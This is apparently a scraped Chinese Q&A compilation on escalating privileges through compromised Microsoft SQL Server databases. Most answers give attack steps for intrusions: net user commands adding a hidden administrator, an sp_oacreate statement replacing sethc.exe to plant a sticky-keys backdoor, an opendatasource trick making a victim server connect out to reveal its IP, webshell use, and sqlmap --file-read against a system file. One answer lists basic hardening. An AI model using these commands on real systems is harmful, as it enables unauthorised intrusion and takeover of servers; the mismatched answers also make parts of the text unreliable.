sqlserver提权

‘壹’ 入侵提权的时候出现xpsql.cpp: 错误 5 来自 CreateProcess（第 737 行）

你好哦楼主~
很高兴看到你的问题。
但是又很遗憾到现在还没有人回答你的问题。也可能你现在已经在别的地方找到了答案，那就得恭喜你啦。
对于你的问题我爱莫能助！
可能是你问的问题有些专业了，或者别人没有遇到或者接触过你的问题，所以帮不了你。建议你去问题的相关论坛去求助，那里的人通常比较多，也会比较热心，能快点帮你解决问题。
快过年了，
最后祝您全家幸福健康快乐每一天！

‘贰’ 如何利用sql shell 提权linux

入侵后看shell脚本有没有cmd的运行权限 有的话添加administrators组的成员账号,然后再利用远程屏幕连接登陆就可以了！ 具体命令是 net user 用户名 密码 /add net localgroup admintrators 用户名 /add

‘叁’ win7+mssql+iis7.0 知道sa密码，提权怎么弄 添加用户拒绝访问。

唉。。一定是遇到了有垃圾变态安全狗的服务器，如果添加用户拒绝访问的话就要用其他方法提权。毕竟win 7系统的服务器我没遇到过。。看看网站还有没有其他的漏洞 比如说pcanywhere弱口令之类的,还可以利用溢出来直接获得权限。

‘肆’ 怎么用sql语句给sql登陆提权

直接在设置你们该 就可以了！要什么权限给什么权限！登录名单击你的用户名然后服务器角色 吧最后一个选中 就可以达到你要的要求了！

‘伍’ sql注入后获得后台然后怎么办

提权一般用CMD或ftp。。。webshell里面都有提权功能的。。

‘陆’ 怎样防止SQL Server引发的远程提权漏洞

更改SQL Server的默认端口1433 为其他端口
开启防火墙 把SQL服务端口不对外开放 只针对本地开放和连接
把SQL Server的sa账户密码改掉 改复杂一点的15到18位 随机密码 就可以防止远程提权漏洞了

‘柒’ mssql sa 如何提权

如果是sa 帐号丢失，可以采用特权模式进入。

‘捌’ 常见的mssql提权方式有哪几种 mssql-xp

1、替换shift文件（在开启3389情况下）

‍下面两条语句为分别执行的。

这条语句将explorer.exe复制为sethc.exe

declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'file',null,'c:\windows\explorer.exe','c:\windows\system32\sethc.exe';

这条语句将sethc.exe复制到dllcache目录下

‘玖’ 对db_dbowner权限提权的讨论

我和你碰到的情况完全一样，他WEB目录里的文件我网页访问的都是一致的，备份的文件也成功了，但就是连接不上 我在他后台上传了一张图片，再去列目录看了下，图片竟不在目录里，从网页中确能访问到。证明了这台根本不是webserver 只是一台SQLserver而 那个目录文件不过是个备份 我想你的情况应该是和我一样了

我想提个问题，如何知道这台SQLserver的IP 呢 他系统装上了IIS 我也备份成功了，连上去估计就能拿到他的webshell 了 关键是如何得他IP

在网上搜索了下的方法 ：其实.即使数据库和WEB不在一块还是有机会搞的.并不是说一点机会没.一般服务器装好系统什么的.都会装个IIS吧？列他C盘.看看有没有Inetpub这个目录.就知道他有没有装IIS了.但是.不知道他IP也？怎么办呢？可以这样来，PING一下WEB服务器.扫他这一C段的1433端口.看看哪台开了.不过这方法也不好.现在很多主机都启用了防火墙.1433端口就算开了你也扫不着.这该怎么办呢？可以利用opendatasource宏让对方的SQL与自己的数据库建立连接.既然能建立连接.就可以得到数据库服务器的IP地址了.我们来试试看.有几个前提得说一下.第一.你机器必须要有公网IP.而且开放的1433端口要保证能被外网访问到.好.条件满足.就开始做吧！

我现在搞的这站.100%数据和WEB不在一块.但是从C盘看到了Inetpub文件夹.说明这数据库服务器安装了IIS.但是得不到他IP呀.怎么搞哦.简单.就用上面所说的方法搞一下.先在本机建个库先.打开查询分析器输入
create database hack520 CREATE TABLE zhu(name nvarchar(256) null);CREATE TABLE J8(id int NULL,name nvarchar(256) null); 点执行 再查看本机IP连接

‘拾’ 有sql注入怎么提权

通过路径的各种爆错无效，无法获得绝对路径，目标网站上面没测试指针，存在phpmyadmin但是也无法爆路径。

读数据库破MD5登录后台发现无利用的地方。

使用sqlmap 的--file-read 对c:oot.ini文件进行读取